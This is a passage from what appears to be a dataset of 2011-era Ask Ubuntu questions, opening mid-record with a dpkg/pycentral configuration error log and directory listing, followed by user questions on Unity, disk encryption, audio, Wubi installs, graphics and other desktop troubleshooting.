fsl-mni152-templates fslview libqwt4c2 libcv2.1 libgsm1 libblas3gf libschroedinger-1.0-0 libavformat52 libnuma1 libdc1394-22 qt3-doc libibverbs1 tk8.4 libpq5 libgfortran3 fsl-jhu-dti-whitematter-atlas libva1 libqt3-mt fsl-juelich-histological-atlas libaudio2 mysql-common libnifti2 libmng1 use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 41 not upgraded . 8 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up python-software-properties ( 0.80.9 ) ... traceback ( most recent call last ) : file `` /usr/bin/pycentral '' , line 2327 , in < module > main ( ) file `` /usr/bin/pycentral '' , line 2321 , in main rv = action.run ( global_options ) file `` /usr/bin/pycentral '' , line 1493 , in run runtimes = get_installed_runtimes ( ) file `` /usr/bin/pycentral '' , line 278 , in get_installed_runtimes default_version = pyversions.default_version ( version_only=true ) file `` /usr/share/pycentral-data/pyversions.py '' , line 172 , in default_version raise valueerror , `` /usr/bin/python does not match the python default version . it must be reset to point to % s '' % debian_default valueerror : /usr/bin/python does not match the python default version . it must be reset to point to python2.7 dpkg : error processing python-software-properties ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of python-aptdaemon : python-aptdaemon depends on python-software-properties ; however : package python-software-properties is not configured yet . dpkg : error processing python-aptdaemon ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of aptdaemon : aptdaemon depends on python-aptdaemon ( = 0.41+bzr646-0ubuntu2.1 ) ; however : package python-aptdaemon is not configured yet . dpkg : error processing aptdaemon ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of python-aptdaemon.gtkwidgets : python-aptdaemon.gtkwidgets depends on python-aptdaemon ( = 0.41+bzr646-0ubuntu2.1 ) ; however : package python-aptdaemon is not configured yet . dpkg : error processing python-aptdaemon.gtkwidgets ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of python-aptdaemon.gtk3widgets : python-aptdaemon.gno apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . tk3widgets depends on python-aptdaemon ( = 0.41+bzr646-0ubuntu2.1 ) ; however : package python-aptdaemon is not configured yet . dpkg : error processing python-aptdaemon.gtk3widgets ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of python-aptdaemon-gtk : python-aptdaemon-gtk depends on python-aptdaemon.gtkwidgets ( = 0.41+bzr646-0ubuntu2.1 ) ; however : package python-aptdaemon.gtkwidgets is not configured yet . python-aptdaemon-gtk depends on python-aptdaemon.gtk3widgets ( = 0.41+bzr646-0ubuntu2.1 ) ; however : package python-aptdaemon.gtk3widgets is not configured yet . dpkg : error processing python-aptdaemon-gtk ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of software-center : software-center depends on python-aptdaemon ( > = 0.40 ) ; however : package python-aptdaemon is not configured yet . software-center depends on python-aptdaemon-gtk ; however : package python-aptdaemon-gtk is not configured yet . software-center depends on aptdaemon ( > = 0.40 ) ; however : package aptdaemon is not configured yet . dpkg : error processing software-center ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of software-properties-gtk : software-properties-gtk depends on python-software-properties ; however : package python-software-properties is not configured yet . dpkg : error processing software-properties-gtk ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : python-software-properties python-aptdaemon aptdaemon python-aptdaemon.gtkwidgets python-aptdaemon.gtk3widgets python-aptdaemon-gtk software-center software-properties-gtk e : sub-process /usr/bin/dpkg returned an error code ( 1 ) no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already tk3widgets depends on python-aptdaemon ( = 0.41+bzr646-0ubuntu2.1 ) ; however : package python-aptdaemon is not configured yet . dpkg : error processing python-aptdaemon.gtk3widgets ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of python-aptdaemon-gtk : python-aptdaemon-gtk depends on python-aptdaemon.gtkwidgets ( = 0.41+bzr646-0ubuntu2.1 ) ; however : package python-aptdaemon.gtkwidgets is not configured yet . python-aptdaemon-gtk depends on python-aptdaemon.gtk3widgets ( = 0.41+bzr646-0ubuntu2.1 ) ; however : package python-aptdaemon.gtk3widgets is not configured yet . dpkg : error processing python-aptdaemon-gtk ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of software-center : software-center depends on python-aptdaemon ( > = 0.40 ) ; however : package python-aptdaemon is not configured yet . software-center depends on python-aptdaemon-gtk ; however : package python-aptdaemon-gtk is not configured yet . software-center depends on aptdaemon ( > = 0.40 ) ; however : package aptdaemon is not configured yet . dpkg : error processing software-center ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of software-properties-gtk : software-properties-gtk depends on python-software-properties ; however : package python-software-properties is not configured yet . dpkg : error processing software-properties-gtk ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : python-software-properties python-aptdaemon aptdaemon python-aptdaemon.gtkwidgets python-aptdaemon.gtk3widgets python-aptdaemon-gtk software-center software-properties-gtk e : sub-process /usr/bin/dpkg returned an error code ( 1 ) how can i fix this ? ? ? ? ? ? i do n't want to reinstall python , as i have a lot of packages installed at this point ... thanks a million , tylerthemiler edit : ls -la /usr/bin/bin/ drwxrwxr-x 3 506 506 4096 2011-08-12 16:51 . drwxr-xr-x 13 root root 69632 2011-08-31 18:12 .. -rwxr-xr-x 1 506 506 96 2011-08-12 15:59 2to3 -rwxr-xr-x 1 root root 1086 2011-08-12 16:00 apirst2html.py -rwxr-xr-x 1 root root 65363 2011-08-12 16:06 ccache-swig -rwxr-xr-x 1 root root 534 2011-08-12 16:11 ckeygen -rwxr-xr-x 1 root root 532 2011-08-12 16:11 conch -rwxr-xr-x 1 root root 197 2011-08-12 16:00 coverage -rwxr-xr-x 1 root root 232 2011-08-12 16:00 cython -rwxr-xr-x 1 root root 286 2011-08-12 16:31 easy_install -rwxr-xr-x 1 root root 294 2011-08-12 16:31 easy_install-2.7 -rwxr-xr-x 1 root root 204 2011-08-12 16:00 egginst -rwxr-xr-x 1 root root 223 2011-08-12 16:00 endo -rwxr-xr-x 1 root root 228 2011-08-12 16:00 endo-readstate -rwxr-xr-x 1 root root 206 2011-08-12 16:00 enpkg -rwxr-xr-x 1 root root 197 2011-08-12 16:00 epydoc -rwxr-xr-x 1 root root 197 2011-08-12 16:00 epydocgui -rwxr-xr-x 1 root root 189 2011-08-12 16:11 ets -rwxr-xr-x 1 root root 208 2011-08-12 16:00 ets3to4 -rwxr-xr-x 1 root root 194 2011-08-12 16:11 ets-docs -rwxr-xr-x 1 root root 227 2011-08-12 16:00 ets_endo -rwxr-xr-x 1 root root 682 2011-08-12 16:05 f2py -rwxr-xr-x 1 root root 6737 2011-08-12 16:05 fitscheck -rwxr-xr-x 1 root root 524 2011-08-12 16:11 flappclient -rwxr-xr-x 1 root root 521 2011-08-12 16:11 flappserver -rwxr-xr-x 1 root root 521 2011-08-12 16:11 flogtool -rwxr-xr-x 1 root root 200 2011-08-12 16:09 fwrapc -rwxr-xr-x 1 root root 47003 2011-08-12 16:01 gif2h5 -rwxr-xr-x 1 root root 201 2011-08-12 16:01 grin -rwxr-xr-x 1 root root 203 2011-08-12 16:01 grind -rwxr-xr-x 1 root root 40238 2011-08-12 16:01 h52gif -rwxr-xr-x 1 root root 9494 2011-08-12 16:01 h5cc -rwxr-xr-x 1 root root 104953 2011-08-12 16:01 h5copy -rwxr-xr-x 1 root root 19508 2011-08-12 16:01 h5debug -rwxr-xr-x 1 root root 196948 2011-08-12 16:01 h5diff -rwxr-xr-x 1 root root 181410 2011-08-12 16:01 h5dump -rwxr-xr-x 1 root root 82444 2011-08-12 16:01 h5import -rwxr-xr-x 1 root root 41356 2011-08-12 16:01 h5jam -rwxr-xr-x 1 root root 131449 2011-08-12 16:01 h5ls -rwxr-xr-x 1 root root 102923 2011-08-12 16:01 h5mkgrp -rwxr-xr-x 1 root root 75467 2011-08-12 16:01 h5perf_serial -rwxr-xr-x 1 root root 4434 2011-08-12 16:01 h5redeploy -rwxr-xr-x 1 root root 157141 2011-08-12 16:01 h5repack -rwxr-xr-x 1 root root 15762 2011-08-12 16:01 h5repart -rwxr-xr-x 1 root root 114276 2011-08-12 16:01 h5stat -rwxr-xr-x 1 root root 38241 2011-08-12 16:01 h5unjam -rwxr-xr-x 1 root root 213 2011-08-12 16:08 helpviewer -rwxr-xr-x 1 506 506 94 2011-08-12 15:59 idle -rwxr-xr-x 1 root root 210 2011-08-12 16:08 img2png -rwxr-xr-x 1 root root 209 2011-08-12 16:08 img2py -rwxr-xr-x 1 root root 210 2011-08-12 16:08 img2xpm -rwxr-xr-x 1 root root 253 2011-08-12 16:01 ipcluster -rwxr-xr-x 1 root root 256 2011-08-12 16:01 ipcontroller -rwxr-xr-x 1 root root 252 2011-08-12 16:01 ipengine -rwxr-xr-x 1 root root 252 2011-08-12 16:01 iplogger -rwxr-xr-x 1 root root 211 2011-08-12 16:01 iptest -rwxr-xr-x 1 root root 250 2011-08-12 16:01 ipython -rwxr-xr-x 1 root root 229 2011-08-12 16:01 ipython-qtconsole -rwxr-xr-x 1 root root 208 2011-08-12 16:01 irunner -rwxr-xr-x 1 root root 200 2011-08-12 16:06 isympy -rwxr-xr-x 1 root root 531 2011-08-12 16:11 lore -rwxr-xr-x 1 root root 24181 2011-08-12 16:07 lproj -rwxr-xr-x 1 root root 590 2011-08-12 16:11 mailmail -rwxr-xr-x 1 root root 579 2011-08-12 16:11 manhole -rwxr-xr-x 1 root root 211 2011-08-12 16:10 mayavi2 -rwxr-xr-x 1 root root 23353 2011-08-12 16:05 miniterm.py -rwxr-xr-x 1 root root 591 2011-08-12 16:11 mktap -rwxr-xr-x 1 root root 10109 2011-08-12 16:10 nc3tonc4 -rwxr-xr-x 1 root root 4531 2011-08-12 16:10 nc4tonc3 -rwxr-xr-x 1 root root 246 2011-08-12 16:11 nctoh5 drwxr-xr-x 11 root root 4096 2011-08-12 16:55 nipy -rwxr-xr-x 1 root root 199 2011-08-12 16:04 nosetests -rwxr-xr-x 1 root root 199 2011-08-12 16:04 nosetests-2.7 -rwxr-xr-x 1 root root 181 2011-08-12 16:36 parrec2nii -rwxr-xr-x 1 root root 2267 2011-08-12 16:05 pilconvert.py -rwxr-xr-x 1 root root 15319 2011-08-12 16:05 pildriver.py -rwxr-xr-x 1 root root 2502 2011-08-12 16:05 pilfile.py -rwxr-xr-x 1 root root 960 2011-08-12 16:05 pilfont.py -rwxr-xr-x 1 root root 2311 2011-08-12 16:05 pilprint.py -rwxr-xr-x 1 root root 220 2011-08-12 16:11 ptdump -rwxr-xr-x 1 root root 222 2011-08-12 16:11 ptrepack -rwxr-xr-x 1 root root 213 2011-08-12 16:01 pycolor -rwxr-xr-x 1 root root 207 2011-08-12 16:08 pycrust -rwxr-xr-x 1 506 506 79 2011-08-12 15:59 pydoc -rwxr-xr-x 1 root root 216 2011-08-12 16:05 pyflakes -rwxr-xr-x 1 root root 205 2011-08-12 16:05 pygmentize -rwxr-xr-x 1 root root 538 2011-08-12 16:11 pyhtmlizer -rwxr-xr-x 1 root root 207 2011-08-12 16:08 pyshell -rwxr-xr-x 2 506 506 10374 2011-08-12 15:59 python -rwxr-xr-x 2 506 506 10374 2011-08-12 15:59 python2.7 -rwxr-xr-x 1 506 506 1619 2011-08-12 15:59 python2.7-config lrwxrwxrwx 1 506 506 16 2011-07-05 19:46 python-config - > python2.7-config -rwxr-xr-x 1 root root 206 2011-08-12 16:08 pywrap -rwxr-xr-x 1 root root 209 2011-08-12 16:08 pywxrc -rwxr-xr-x 1 1001 users 90834 2011-08-12 16:00 remove-epd-7.1-2 -rwxr-xr-x 1 root root 597 2011-08-12 16:00 rst2html.py -rwxr-xr-x 1 root root 794 2011-08-12 16:00 rst2latex.py -rwxr-xr-x 1 root root 603 2011-08-12 16:00 rst2man.py -rwxr-xr-x 1 root root 730 2011-08-12 16:00 rst2newlatex.py -rwxr-xr-x 1 root root 1701 2011-08-12 16:00 rst2odt_prepstyles.py -rwxr-xr-x 1 root root 767 2011-08-12 16:00 rst2odt.py -rwxr-xr-x 1 root root 604 2011-08-12 16:00 rst2pseudoxml.py -rwxr-xr-x 1 root root 640 2011-08-12 16:00 rst2s5.py -rwxr-xr-x 1 root root 605 2011-08-12 16:00 rst2xml.py -rwxr-xr-x 1 root root 673 2011-08-12 16:00 rstpep2html.py -rwxr-xr-x 1 root root 6780 2011-08-12 16:06 scons -rwxr-xr-x 1 root root 6780 2011-08-12 16:06 scons-2.0.1 -rwxr-xr-x 1 root root 16879 2011-08-12 16:06 sconsign -rwxr-xr-x 1 root root 16879 2011-08-12 16:06 sconsign-2.0.1 -rwxr-xr-x 1 root root 50487 2011-08-12 16:06 scons-time -rwxr-xr-x 1 root root 50487 2011-08-12 16:06 scons-time-2.0.1 -rwxr-xr-x 1 506 506 18542 2011-08-12 15:59 smtpd.py -rwxr-xr-x 1 root root 220 2011-08-12 16:11 sphinx-autogen -rwxr-xr-x 1 root root 195 2011-08-12 16:11 sphinx-build -rwxr-xr-x 1 root root 206 2011-08-12 16:11 sphinx-quickstart -rwxr-xr-x 1 root root 1515029 2011-08-12 16:06 swig -rwxr-xr-x 1 root root 528 2011-08-12 16:11 tap2deb -rwxr-xr-x 1 root root 615 2011-08-12 16:11 tap2rpm -rwxr-xr-x 1 root root 596 2011-08-12 16:11 tapconvert -rwxr-xr-x 1 root root 534 2011-08-12 16:11 tkconch -rwxr-xr-x 1 root root 670 2011-08-12 16:11 trial -rwxr-xr-x 1 root root 208 2011-08-12 16:10 tvtk_doc -rwxr-xr-x 1 root root 607 2011-08-12 16:11 twistd -rwxr-xr-x 1 root root 20354 2011-08-12 16:07 vtkencodestring -rwxr-xr-x 1 root root 4952419 2011-08-12 16:07 vtkpython -rwxr-xr-x 1 root root 109429 2011-08-12 16:07 vtkwrappython -rwxr-xr-x 1 root root 10356 2011-08-12 16:07 vtkwrappythoninit lrwxrwxrwx 1 root root 41 2011-08-12 16:08 wx-config - > ../lib/wx/config/gtk2-unicode-release-2.8 lrwxrwxrwx 1 root root 8 2011-08-12 16:08 wxrc - > wxrc-2.8 -rwxr-xr-x 1 root root 101486 2011-08-12 16:08 wxrc-2.8 -rwxr-xr-x 1 root root 1627 2011-08-12 16:01 xml2-config -rwxr-xr-x 1 root root 214 2011-08-12 16:08 xrced -rwxr-xr-x 1 root root 2450 2011-08-12 16:01 xslt-config
59480	will the lightning calendar app be available in 11.10 ?	further , if it is available , will it be integrated into the indicators by default ? i need my google calendar offline , so is it back to evolution ?
59481	unity launcher autohide wo n't work	ever since i installed 11.04 i 've been having this freaking problem with the unity launcher . i do n't know what the hell i do - but , initially , when i boot ubuntu , the autohide works . and then - i have no clue how - i go over to the sidebar with my mouse , and for some reason , it wo n't autohide again and overlap all windows that i work with . it 's f ... ing annoying ; and i seem to be too noobish to configure it . i got myself compizconfig settings manager , but even there , the setting is on 'dodge windows ' - the default . and it wo n't work either when i put it on 'autohide ' or any of the other settings . how can i fix this ?
59485	how do i create a .xession / .xinitrc file to launch the default xubuntu-session ?	i 'm trying to use slim instead of gdm as a login manager , but i fail miserably when creating the proper .xsession / .xinitrc file needed by slim . how would a proper .xession file look like to start the xubuntu-session ? there are great guides about setting up custom desktop environments , but i am missing something . i tried copying contents of the xubuntu.desktop files in /usr/share/xsessions/ which reads `` exec=/usr/share/xubuntu/session.sh '' into a .xsession file , but slim would not show up . what else could i be missing ? any help would be very much appreciated !
59486	how does mouse sensitivity work ?	i have a problem here with mouse sensitivity . i open mouse settings to increase the sensitivity to maximum and the mouse is slower . i make it minimum sensitivity ( through the slider ) and the mouse is incredibly fast . is this a bug or do i just not get it ?
59487	how to configure lvm & luks to autodecrypt partition ?	i have recently installed ubuntu server 11.04 with the full lvm encryption ( installed from the setup ) . i wish now to use a key file to do automatic unlock . i have tried to follow this guide http : //ubuntuforums.org/showthread.php ? t=837416 i generated a key with this command : sudo dd if=/dev/urandom of=/boot/grub/keyfile bs=1024 count=4 i putted it in /boot/grub because i think that it 's not encrypted . when i try to add the key with this commad sudo cryptsetup luksaddkey /dev/sdx /boot/grub/keyfile it asks me for the passphrase and when i put it nothing happen , nothing is printed to the screen ! i ignore it and continue the others steps and reboot but nothing happened and it ask for the passphrase . thanks for the help .
59488	two ubuntu partitions with different swap partitions	i have installed two ubuntu partitions and they appear to be using two different swap partitions . is this a safety thing or is it a waste of space ? if the latter , how do i set up one ubuntu to use the other 's swap partition ?
59489	how to switch between hybrid graphics intel/nvidia ?	i have a samsung np-qx411 . it has two graphics cards , intel and nvidia . the intel drivers were quickly found and is fully functional . but nvidia , i have tried installing several drivers in different ways . but i can not run it without success . i do not understand how ubuntu has by default the switch hybrid graphics option . what should i do ?
59490	how to get firefox ' about : home page look like the one on windows ?	i 'd like to have this as my homepage : do i have to replace some files or link to a page , could anyone please tell me ?
59493	how to stop the login server ?	with gdm removed in oneiric , what command can i replace from the old command ? sudo /etc/init.d/gdm stop i need to install an nvidia .run file and can not figure out how to stop the server .
59494	what players do support flac files with embeded cue sheet ?	i recently got some flac files with embeded cue sheet . though , the info of the sheet file does n't seem to show up in rhythmbox ; banshee ; amarok or audatious . which media players support this kind of file ?
59501	why does `` terminal '' fail to execute a custom launcher/command in terminal ?	i had dabbled around scripting and i stumbled with a screen recording script , but everytime i try to run it , my terminal fails to and shows me this error : there was an error creating the child process failed to execute child process `` /home/kenny/screencast.sh '' ( permission denied ) any way that i could fix this ? i did not create this script , i just found it in this blog , because all of the screen recording software i get from the ubuntu software center fails to record a decent video .
59502	how do i make my apps windows get their own unity launchers ?	i 'm writing an application that potentially uses quite a few windows . it would be nice if i could make at least some of those windows get their own unity launcher entries . how do i do that ?
59503	sound issues ( minecraft , espeak )	being a new ubuntu user , i 've no idea where to begin to solve this problem . i installed ubuntu into winxp with wubi . tried downloading minecraft and installing sun java , and everything worked well . then i played around to get adobe flash to work correctly , installed some sound packages and some non-free extras thing , i do n't recall everything i did . tried to get some speech synthesis applications to work . suddenly i noticed i had two java versions installed , but i ( think i ) managed to get minecraft to load with the the sun version , by selecting `` open with '' etc . however , i am stuck with minecraft sound being laggy . sound plays 4-5 seconds after the action , and not all sounds play . e.g . if i whack something 10 times , 1 sound plays . also , espeak no longer works . espeak `` hello '' is completely silent . i think something is messed up with my sound , but i have no idea where to begin to solve this . any advice would be appreciated .
59519	do you recommend luks encryption on a ssd ( trim support ) ?	i have a laptop ( dell inspiron 11z ) and and ssd ( samsung 128gb ) on order . on my current laptop , i have a spinning hdd and use lvm and luks encryption . i would like to use luks on the ssd but from doing a bit of research i am not sure if this is desirable/possible . it seems that luks ( possibly ? ? ? ) may prevent trim from working . i ca n't find any concrete info on this and lots of the info on ssds such as alignment etc seems to be out of date . will trim work with luks ? because a laptop may be prone to theft , i like to have my data properly encrypted so this is important to me
59520	how to convert wav to ogg and mp3 using vbr	how to convert wav to ogg and to mp3 with vbr and excellent end quality ? if possible , using soundconverter or ffmpeg . incidentally , i tried to see whether soundconverter uses vbr and there is nothing about it in the gui preferences , so it is not clear . does it ?
59524	how can i chat in the terminal on a local lan ?	i 've heard that if there are computers interconnected via lan ( as we have in our college labs ) , i can chat with other friend of mine , who is probably 2-3 rows ahead of me . i did some google on this & came to know that all this could be done via terminal , using commands -- wall , talk , write etc . i tried all , but none worked . so can anyone tell me detailed way of doing so . i doubt that i 'm missing the `` order '' in which the steps are to be followed , or may be some packages to be installed ? please give as much details as possible . our college labs are currently running ubuntu 10.04
59525	networkmanager : marking connection invalid	i 'm having a problem connecting to a wireless network . finally networkmanager manager responded with : marking connection invalid . however , the connection is not even listed ! so how do i unmark the connection as invalid so it shows up again ?
59528	flash forms do n't recognize japanese text input	problem ubuntu natty input method is scim-anthy example website http : //pigg-life.ameba.jp/ when playing this or any other flash community game it is possible to switch to the japanese input but even after switching , only english appears in the flash text input field . why is this ? how can i make this work background house wives love to play those facebook type community games and they are all based on flash . but using ubuntu , flash always crashes on us when we try to run it with two browsers at once , like firefox and chromium , which is necessary to do if you want to sign in with two different user names at the same time . that is the small problem . the big problem is when my wife tries to input japanese text into a flash input field . even though she has used scim to switch to the japanese anthy text input as she always does , only english comes out when typing in a flash text input box . this is horrible , because this is all she uses a computer for and it is the one thing ubuntu fails miserably at .
59530	how can i get back super+a/super+f ?	my prefered way to launch programms in natty was to hit super+a and type a few letters . this does not work in oneiric anymore . i have to use the mouse which is really cumbersome . alt+f2 is not a good replacement . is it possible to activate the super+a shortcut or will it be back until oneiric release ?
59531	what kind of sensitive information gdm log files may contain ?	ubuntu-bug warns me about including gdm log files since they may contain sensitive information . can you be more specific what kind of sensitive information these files may contain ?
59534	how can i configure the launcher in unity 2d ?	is it possible to resize the unity 2d launcher ? is it possible to change the reveal mode from the left edge with delay to the top left corner without delay ?
59535	why is wubi copying files so slowly , mostly with no hard drive activity ? ( 11.04 )	tl ; dr installing wubi 11.04 over win7pro ( 64-bit ) on a dell latitude e5520 has now taken over an hour to reach the halfway mark in the `` copying files ... '' stage . the hard drive appears inactive for long periods no network connection , wifi is on and networks available , system is responsive . but just oh so slow . what gives ? full story i 've finally unpacked my new dell latitude e5520 . my first move was to install windows 7 pro ( 64-bit ) from scratch , followed by ubuntu using wubi . i 'm using wubi because the system comes with three paritions ( recovery , os , and something else - boot booster ? ) and i like having a data partition available so i can blank the oses without having to restore my data . that brings the partition count to the maximum four . besides , for similar reasons i 've been using wubi on my eee 1015p netbook . wubi makes so little impact that i 've never gotten around to replacing it with a proper installation . so , i downloaded wubi and ran it while online . the windows phase of the installation goes ahead without any problems at all . i selected a username and password , regular ubuntu flavour , and assigned the maximum 30gb for the ubuntu filesystem . i then reboot into ubuntu by my own choosing . the wubi install proceeds to `` copying files ... '' and copies the files . slowly . not just user-impatience slowly , really slowly . getting to the halfway mark took over an hour , and there are long periods ( nearly 15 minutes at one point ) where there was no apparent hard disk activity . the hd light does n't flicker and the fan switches off for a few minutes at a time . the system is responsive ( i can move the cursor with the mouse or touchpad , for example ) , just nothing seems to be happening . when i first tried this , i thought the installation had failed , so i hard-rebooted my machine back into windows and removed ubuntu . i then downloaded the iso manually , unplugged the network , and tried ubuntu again . since i have more time to spare , i 've left it longer , with the drop-down terminal section open to see if any errors were coming up . i do n't think so , since each file seems to be followed by something like debconf ( filter ) : widget found for ubiquity/install/title debconf ( filter ) : -- > 0 ok but it 's still crazy slow . the current file is taking more than 25 minutes . the only notable thing i can think of is that the wifi is on and there are networks available . there is n't a hardware wifi button . i guess i could 've disabled it in the bios , but i 've now progressed further than i did before , and i suspect it 's working . just excruciatingly slowly . i do n't remember this happening when i installed 10.10 on my eee . eventually , i think the screensaver kicked in , which led to an unresponsive blank black screen . i hard-rebooted again , but disabled the wifi in the bios on the way . i went straight back to ubuntu ( i.e . i did n't reinstall via wubi ) . the same sluggishness seems to be persisting , though : slow copying and long idle phases .
59537	keyboard layouts failing to apply	i have an ubuntu 11.04 install for which i ca n't seem to get the correct ( uk english ) keyboard mapping set on . running setxkmap produces an error : '' xkb extension not present on :10.0 '' . if go to system - > keyboards - > layouts and select the only layout installed `` english keymap '' and press show , i get a blank dialog . i 'm using xrdp and that this is almost certainly connected to xrdp using it 's own keyboard mapping files . what i ca n't tell is how it can be changed . does anyone know how i can install and activate the correct keymap ?
59539	is there any way to stop a window 's title bar merging with the panel when maximised ?	i 'm working on a desktop machine with plenty of screen real-estate , so i do n't need my windows ' title bars to merge with the global menu bar when the windows are maximised . moreover , i 'm working on a dual-screen set-up , so the fact that a window is maximised does n't mean that it 's the only window visible . before unity i 'd switch to a maximised window by clicking on its title bar , or close the window , even though it is n't focused , by clicking on its close button ; i can no longer do this because the title bar is missing and the global menu bar is empty on that screen . this is n't a huge problem - i can click on some of the window 's chrome to focus it - but it 's unintuitive and it 's forcing me to relearn my mousing behaviour . i 'd like to turn-off the merging of title and global menu bars , but how ? edit : i simply want the title bar of the window not to merge with the top panel whenever i maximize a window . the global menu should stay in the top panel as far as i am concerned . current it maximizes like this i want it to maximize like this ( in that screeny the unmaximized window has been resized to take rest of the space )
59540	can one pick up a running application from terminal ?	sometime i need to run an application from terminal for debugging . if i am sure the bug will occur short after launching the application , i can run this application from the terminal . however , bugs occur unexpectedly , and then only i need to monitor the buggy application from the terminal ( to see its output ) . can i then pick up an application from terminal , which was not launched using terminal ? if so how ?
59546	what kind of harm there is from removing ( purging ) package apt-xapian-index ?	i know you ca n't use quick filter in synaptic after purging apt-xapian-index , but is there something more severe ? i know there are some performance issues , when you have it : https : //bugs.launchpad.net/apt/+bug/363695 https : //bugs.launchpad.net/ubuntu/+source/apt-xapian-index/+bug/655831
59547	how to add string to the end of a file without '\n ' ?	echo `` xxx '' > > file_a is similar to what i want . but it always attach string with a new line . if i just want to attach string without a new line , how to do it ? thank you~
59551	how to burn a .iso to a usb device ?	i want to burn a windows iso to a usb device in ubuntu . how do i do this ? i know how to burn a ubuntu iso into a usb device , but with a windows iso it 's not the same .
59556	optimize ubuntu install on usb-drive for longer life	i 've got an ubuntu installed on an usb-drive for portable use . it 's a regular install and not a live usb . needless to say , it 's a flash-based storage and only 16 gb . what can i do to extend its life ? n.b . currently my main pc is missing a hdd so the usb-drive is in regular use . i 'm afraid that i 've already shaved off quite a bit of its life .
59559	how to configure workspace layout ?	i have moved from maverick to oneiric and my workspace configuration changed from one row of five workspaces to two rows of two workspaces each . it looks like in oneiric there was a migration for gconf since gconf-editor is not installed . is there a way to add or configure workspace layout in oneiric with unity ? many thanks !
59560	install ftp server with support for virtual users	i 'm trying to install an ftp server on ubuntu 11.04 . i 've installed vsftpd , but i had no success in getting it to work with virtual users . i want to be able to have give fake users and direct them to some directory .
59562	usb headset output suddenly stopped	i have been using my usb headset with no problems up to about a week ago . ubuntu registers that the device is plugged in and i can select it in the sound menu for output or in pulseaudio volume control , however i hear nothing . i have messed with just about every setting going , in the sound menu and the pav contol menus to no avail . the headset is not the problem as it works fine in windows . does anyone have any idea what may be causing this ? ( as a side note , the mic works fine )
59563	how to install a different version of python-dev ?	the default python version on my ubuntu system is 2.7 , but 2.6 is still present . i 've installed headers ( apt-get install python-dev ) , since it 's needed to compile and install python packages , for current version . however , some of my projects still run on a 2.6 virtual python environment . for them , i can not install eggs and packages since , among others , python.h is missing . do i need to install an older version of python-dev ? how to do so ?
59566	terminal shortcut key	i liked the shortcut for opening a terminal and if i remember correctly it was ctrl-alt-t that opened a terminal window . now with a later version of ubuntu this shortcut is no longer predefined , i must add it myself from the shortcut settings . do you know why this shortcut was removed ? thanks for any answer $ uname -a linux ubuntu 2.6.38-8-generic # 42-ubuntu smp mon apr 11 03:31:24 utc 2011 x86_64 x86_64 x86_64 gnu/linux
59567	samsung n150 backlight issue	i have a samsung n150 netbook and i try ubuntu 11.10 . in natty backlight changing does not work at all . in oneiric it does , but i can only switch between 100 % and minimum . if i boot in battery mode the backligth is `` blingking '' continously . how can i fix that ?
59571	overlapping text in software center	as can be seen from the image , some text gets overlapped in the description field of the software . has anyone else experienced this ? should i report a bug against software-center ?
59577	replace xscreensaver with gnome-screensaver ( xubuntu )	i have recently apt-get remove 'd xscreensaver and apt-get install 'd gnome-screensaver . this appears not to have worked because when i press the lock screen menu item , nothing happens . i have tried putting gnome-screensaver in the list of autostart applications but this does n't help ( must it be started before anyone logs in ? ) . how can i make gnome-screensaver work properly and make the lock screen button do what it 's supposed to ? thanks in advance , ell . edit : i am using xubuntu 11.04 and the output of ps aux | grep saver is : elliot 1374 0.0 0.3 27344 6024 ? ss 19:35 0:00 gnome-screensaver elliot 1669 0.0 0.0 4160 848 pts/0 s+ 19:48 0:00 grep -- color=auto saver but i think the above information will now be irrelevant as it seems that locking the screen now works , when i lock the screen i get a black screen and when i move the mouse , the unlock dialog pops up so now all i need to do is set a screensaver , can anyone help me out on that ?
59585	how do i play a real media '.rm ' file	no player seems to support the real media codecs i need . i have even tried vlc and movie player , both of which failed .
59587	encrypted lvm not accepting my passphrase anymore	i have ubuntu 11.04 on thinkpad x41 and have been using it for a couple of months . from time to time system update used to run and show me a list of recommended updates . finaly , yesterday i accepted all of them and after some time i had it all 'updated ' . today , after i restarted my laptop , i realized that my passphrase does n't work anymore ! ! at first i thought i have real memory problem , but then i recalled that recent update . when i run it in recovery mode it looks like that : unlocking the disk /dev/disk/by-uuid/ [ ... ] ( sda5_crypt ) enter psasphrase : **************************** [ timestamp ] intel aes-ni instructions are not detecred . no key available with this passphrase . cryptsetup : cryptsetup failed , bad password or options ? i 'm desperate to get all my files back , do you have any idea how to help with that ? i guess there might be something about this intel aes-ni but no idea how to fix it .
59593	how to set up a virtual machine with virtualbox	i have decided to set up a virtual console on my laptop to be able to test stuff like other distros . i have never attempted such things before so i 'm a bit hesitant and therefore i need a complete step by step guide for such an operation using the virtualbox.deb i have downloaded . any other tips is also welcome .
59594	how do i enable the ctrl+alt+backspace shortcut in 11.10 ( gui ) ?	i know there is a command line solution here : how can i enable ctrl+alt+backspace ? however , i am looking to enable it the way you used to on previous versions ( the settings are not there in gnome 3.2 it seems ) .
59597	are there any good mongodb gui clients ?	are there any good mongodb gui clients for ubuntu ? ( preferably that will run on ubuntu 11.04 . ) i found one ( jmongobrowser ) but i 'm not that impressed by its performance . it works but would like to know if anyone knows about something better and/or more stable .
